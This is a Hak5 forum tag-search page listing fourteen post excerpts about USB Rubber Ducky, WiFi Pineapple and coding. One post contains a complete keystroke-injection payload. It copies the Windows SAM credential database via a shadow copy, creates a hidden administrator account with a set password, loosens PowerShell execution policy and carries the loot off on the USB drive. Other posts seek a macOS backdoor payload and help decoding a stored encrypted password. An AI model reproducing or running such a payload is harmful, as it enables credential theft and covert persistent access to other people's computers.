Jump to content

Search the Community

Showing results for tags 'code'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

Found 14 results

  1. I knew of this guy (Samy Kamkar) during his counter strike days. He was brought back into my live Via Tim Ferriss' podcast and I enjoyed the ideas on his website. (Samy.pl). Now with my ventures into the Pineapple I'm revisiting the ideas on his website for use with the Pineapple. Has any one used NAT Pinning or click jacking with the Pineapple? For those that don't know, Samy was responsible for the Myspace Worm and if memory serves my right, was a key player to bringing attention to Apple phones recording your location. Here are some of things I'm interested in and would love to know the viability in their use in the Nano/tetra world. pwnat: Advanced client-server NAT-to-NAT penetration Quickjack: Automated Clickjack and Frame Slicing Tool NAT Pinning: Forcing Remote Routers to Port Forward pwnat: Advanced client-server NAT-to-NAT penetration
  2. I was kinda curious how other people would do this. So you take a regular Fibonacci sequence like this: 0 1 1 2 3 5 8 13 21 34 55 89 144 233 377 610 987 1597 2584 4181 6765 10946 17711 28657 46368 75025 121393 196418 317811 514229 832040 1346269 2178309 3524578 5702887 9227465 But I'm changing it up a bit so I get a different sequence like this one: 1, 2, 4, 7, 11, 20, 33, 54, etc The math looks something like this and I can do it on paper. 1+1+2+3+5+8+13+21+34+45+79 1+1+2+3+5+ 8+13+21+34+45 1+1+2+3+ 5+ 8+13+21+34 1+1+2+ 3+ 5+ 8+13+21 1+1+ 2+ 3+ 5+ 8+13 1+ 1+ 2+ 3+ 5+ 8 1+ 1+ 2+ 3+ 5 1+ 1+ 2+ 3 1+ 1+ 2 1+ 1 1 So in a regular fibonacci sequence it's something like this: #include<iostream> using namespace std; int main() { int fib1 = 0, fib2 = 1, fib3 = 1; cout << "The Fibonacci Series is : " << endl << fib1 << " " << fib2 << " "; while (fib1 + fib2 < 1000000) { fib3 = fib1 + fib2; fib1 = fib2; fib2 = fib3; cout << fib3 << " "; } cout << endl; return 0; } Not sure if the best way to to do this is write all of the possible fibonacci numbers to an array then loop through the array to add up the numbers for the sequence or if I should use the final fib values and count backward from the final two fib values just doing a backwards subtaction pattern. These are hypothetical questions. Question: Can you create a dynamic multi-dimensional array without knowing how many dimensions the array will have. I understand the part about creating a dynamic array where you can load in any number of variables. I suppose I could just load all of those values into an array then use nested for loops for each iteration. So int a =x; int b =x-1; int c= x-2; etc. Peronally I like array idea because it is easy but that's not the most optimal way to do it. I'm sure someone a little more savvy could make this happen using less memory and faster. Using Fibonacci's sequence to describe timeline forks. So say you have computer virus that spread from one machine to the next in a given amount of time. The first machine will continue to also infect machine until there are no more machines to infect. But that's not the only application for this.
  3. my usb rubber ducky came today! however there seems to be a problem.no matter what .bin i put on it. it just bugs out. opens start types JG3;]]]JG/13;]]jg++3jg3#]]]3jg/3[[=0=.[9.\'+.JG opens https://support.google.com/chrome/?p=help&ctx=keyboard#topic=3227046 goes full screen then ends. does this with all .bins i put on.
  4. With cloud.wifipineapple.com down, is there another place where I can find the MK5 source code?
  5. I'm trying to get my usb ducky to save the sam file to the flash drive as well as create a new admin user. I'm not really sure where I am going wrong here but if anyone has advice or a code that works it would be greatly appreciated!!! DELAY 5000 GUI r DELAY 750 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 750 ENTER ALT SPACE DELAY 750 STRING m DELAY 750 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime ENTER STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory ENTER STRING $date = get-date ENTER STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>" ENTER STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' ENTER STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" ENTER STRING $createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\', 'ClientAccessible') ENTER STRING $shadow = gwmi Win32_ShadowCopy | ? { $_.ID -eq $createShadow.ShadowID } ENTER STRING $addSlash = $shadow.DeviceObject + '' ENTER STRING cmd /c mklink C:\shadowcopy $addSlash ENTER STRING Copy-Item 'C:\shadowcopy\Windows\System32\config\SAM' $fileSaveDir ENTER STRING Remove-Item -recurse -force 'C:\shadowcopy' ENTER STRING Net User Admin tacos /ADD ENTER STRING Net LocalGroup Administrators Admin /ADD ENTER DELAY 500 STRING reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList' /v Admin /t REG_DWORD /d 0 /f ENTER STRING $Report >> $fileSaveDir'/ComputerInfo.html' ENTER STRING function copy-ToZip($fileSaveDir){ ENTER STRING $srcdir = $fileSaveDir ENTER STRING $zipFile = 'C:\Windows\Report.zip' ENTER STRING if(-not (test-path($zipFile))) { ENTER STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) ENTER STRING (dir $zipFile).IsReadOnly = $false} ENTER STRING $shellApplication = new-object -com shell.application ENTER STRING $zipPackage = $shellApplication.NameSpace($zipFile) ENTER STRING $files = Get-ChildItem -Path $srcdir ENTER STRING foreach($file in $files) { ENTER STRING $zipPackage.CopyHere($file.FullName) ENTER STRING while($zipPackage.Items().Item($file.name) -eq $null){ ENTER STRING Start-sleep -seconds 1 }}} ENTER STRING copy-ToZip($fileSaveDir) ENTER STRING $usbPresent = 'False' ENTER STRING do { ENTER STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY’ } | Measure ENTER STRING if ($present.Count -ge 1){ ENTER STRING $usbPresent = 'True' }Else { ENTER STRING $usbPresent = 'False'}} ENTER STRING until ($usbPresent -eq 'True') ENTER STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY’ } | select Name ENTER STRING move-item c:\Windows\Report.zip $driveLetter.Name ENTER STRING remove-item $fileSaveDir -recurse ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 1500 STRING C:\Windows\config-d04a8.ps1 ENTER DELAY 750 ALT F4 DELAY 1500 GUI r DELAY 750 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 1500 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 1500 STRING m DELAY 1500 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 750 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER
  6. Hello... I saw that there is a 'Composite Duck 4x CAPS Trigger' for the Ducky. I have downloaded and compiled some of the Source Code but I didn't see any code for the x4 Caps trigger. I know midnitesnake is working with this, but I wondered if it was possible to get a copy of the source code for the x4 Caps Normally I would experiment with while loops and if statements, but I really don't want to damage the Ducky. It's not that I'm lazy, I just don't want to damage my little Ducky. Any help would be great. Thanks in advance.
  7. I am going to be working on an project with ducky script for android , be on the look out
  8. Hello, I was wondering if you can use the Pineapple mark 5 to find out WIFI passwords. Thank you
  9. Big Up Date The Project is now at Halt due to fact that my Rubber Ducky Has Red Light And i cant fix it so i will be buying a new one after i saved up for WiFi Pineapple i will be still coding it but cant really test any thing that needs a rubber ducky SORRY Read Me First This project was pick up From Hak5 User SEE CREDITS FOR NAME'S But seem project was drop so i takeing on my self to carry this on due to amount of people Requesting this am not coder i only really know batch (KILL me i know) i fort why not make something of use and not other webpage reader like android store is full of them so this will take time more time than any one else so thanks Know Bug's 1.Load Payload dose not work 2.save .bin dose not save to cd but to phone internal memory Credit Old Project Owner: joseph pintozzi I have given right to edit this project and give modified Project away UPDATE'S V0.0.1 Exported project to android studio ( taken me last 2 days to fix it all then Google make update that make all my work go to hell so GG all fixed now) Working on save as it not playing nice may need to make folder for all saved for trying to work out how to make it open ever .text or .bin will look about may need some help google my friend ========================================================================================== Q1.Will it be on Google store A1.i hope so but google may not like what it used for but i cant see why not they have terminal so why hell not i will be email them to see were i stand Dont worry if not i will Host it on my own site For you guys Q2.How much will this cost? A2.Free Why? one it not my it free code and two Shareing is caring Q3.Can we the users help ? A3.God yes i will all ways love your input and help as i said i am very new so it will help me if i am stuck Q4.Can we ask for stuff to be added ? A4.Yes but keep in mind i am new But ye for sure i cant think this all out on my own If you like to post in Q&A Just put Q.A In your pm or comment and it will be add ==========================================================================================
  10. The Duckuino I recently learned that the Arduino Leonardo and the Arduino Micro are both capable of pressing keys as an HID. Instantly I thought of USB Rubber Ducky and Duckyscript. I had some spare time, so I decided to write this, Duckuino, a simple Duckyscript to Arduino converter. It's not very pretty, but it seems to be reliable. Features: Convert Duckyscript to Arduino(Duh!) Basic program memory storage(works better with large programs than traditional SRAM) Arduino code and Duckyscript combo! (fairly buggy in some places) What was that about Arduino code alongside Duckyscript? Due to the nature of the converter, quite a bit of Arduino code can be programmed inside the Duckyscript before conversion. This is useful for things the program doesn't auto-add such as loops and if statements. Known bugs: Letters may occasionally get offsetted For some reason the usage of 'CTRL C' doesn't work but 'CTRL c' does... Examples: Input: DELAY 100 STRING Hello world! I am Duckuino! ENTER CTRL ALT DELETE Output: void setup() { Keyboard.begin(); delay(100); print(F("Hello world! I am Duckuino!")); type(KEY_RETURN); press(KEY_LEFT_CTRL); press(KEY_LEFT_ALT); press(KEY_DELETE); Keyboard.releaseAll(); Keyboard.end(); } void type(int key) { Keyboard.press(key); Keyboard.release(key); } void print(const __FlashStringHelper *value) { Keyboard.print(value); } void loop(){} IMPORTANT NOTE: I am not responsible for anything evil you do or generate with this. Also, this program will only work on Arduinos that support the keyboard library. I'm not the best at Duckyscript so I apologize if I've missed any commands or functions, feel free to contribute and/or download here: https://github.com/Plazmaz/Duckuino If you've made something cool with Duckuino, I'd love to hear about it, send me a PM or post a reply! EDIT: Almost forgot to give credit to http://ctrlaltnarwhal.wordpress.com/2012/10/31/installing-usb-rubber-ducky-on-3rd-party-devices/ for the idea!
  11. Hey, Wondering if there's any sort of ETA on the release of the firmware source code. It'd be fantastic to be able to build tools outside of the normal realm of what's available via OPKG (i.e. bully, etc.), but unfortunately I seem to be at a loss without the source code to run with, since it's using a different kernel and libraries than that of which are normally available with vanilla OpenWRT. Thanks ;)
  12. What happened the Github Repo @ https://github.com/WiFiPineapple/web-interface for the pineapple interface? i was about to fork it and make some optimizations to the code that i thought would help, but the repo is gone...
  13. Hey guys, I would like to go about creating a payload for the Rubber Ducky that pretty much does the same thing as the *RunEXE from SD* payload but on OSX using a .JAR file. How would I do this? The payload for EXE files on windows uses a batch file that waits for the SD card to be mounted but OSX doesn't use batch files? Sorry for my inexperience, I am both a Windows and a Kali user but need this payload for penetration testing on Macs. I think the only alternative would be to open a OSX backdoor and download and run the file in terminal. I would rather not resort to this though because if I was trying to install on multiple machines I would have to change the listening port every time to download the file. A little more time consuming and inefficient compared to a straight SD card transfer and run.
  14. Greetings! I'm having a problem with a Hex-code Password from a registry file. Its related with Bearshare. I fed in a hex to ASCII converter, and this string pops out: Ð Ñ O eMž í» EncryptedString ü ©c \ °·Ûv â Ë ¥ ³ M3æ ¥Ç" ïr©ÜVâ5à $l Ž Lol, any help would be greatly appreciated. Thanks! > Registry Contents below: "Password"=hex:01,00,00,00,d0,8c,9d,df,01,15,d1,11,8c,7a,00,c0,4f,c2,97,eb,01,\ 00,00,00,90,ae,9f,9f,65,be,4d,48,9e,ae,18,17,ed,13,bb,75,00,00,00,00,20,00,\ 00,00,45,00,6e,00,63,00,72,00,79,00,70,00,74,00,65,00,64,00,53,00,74,00,72,\ 00,69,00,6e,00,67,00,00,00,10,66,00,00,00,01,00,00,20,00,00,00,fc,91,a9,72,\ 63,dc,5c,a3,b0,09,b7,e9,db,6c,76,e7,00,00,00,00,04,80,00,00,a0,00,00,00,10,\ 00,00,00,e2,09,cb,36,0d,35,a5,d8,b3,a8,4d,70,33,50,e6,5d,10,00,00,00,09,11,\ a5,f6,c7,52,22,29,ef,9b,72,55,a9,84,dc,17,14,00,00,00,01,6f,56,7c,e2,65,35,\ 04,e0,5a,81,24,24,77,6c,d1,8e,bd,05,40 "AutoConnect"=dword:00000001 "RememberPassword"=dword:00000001 "Default"=dword:00000001 "Status"=dword:00000001 "Guest"=dword:00000000 "LoginUserType"=dword:00000000 "ActiveTabInSearch"=dword:00000000 "ActiveTabInWeb"=dword:00000000 "AdditionalResults"=dword:0000002d
×
×
  • Create New...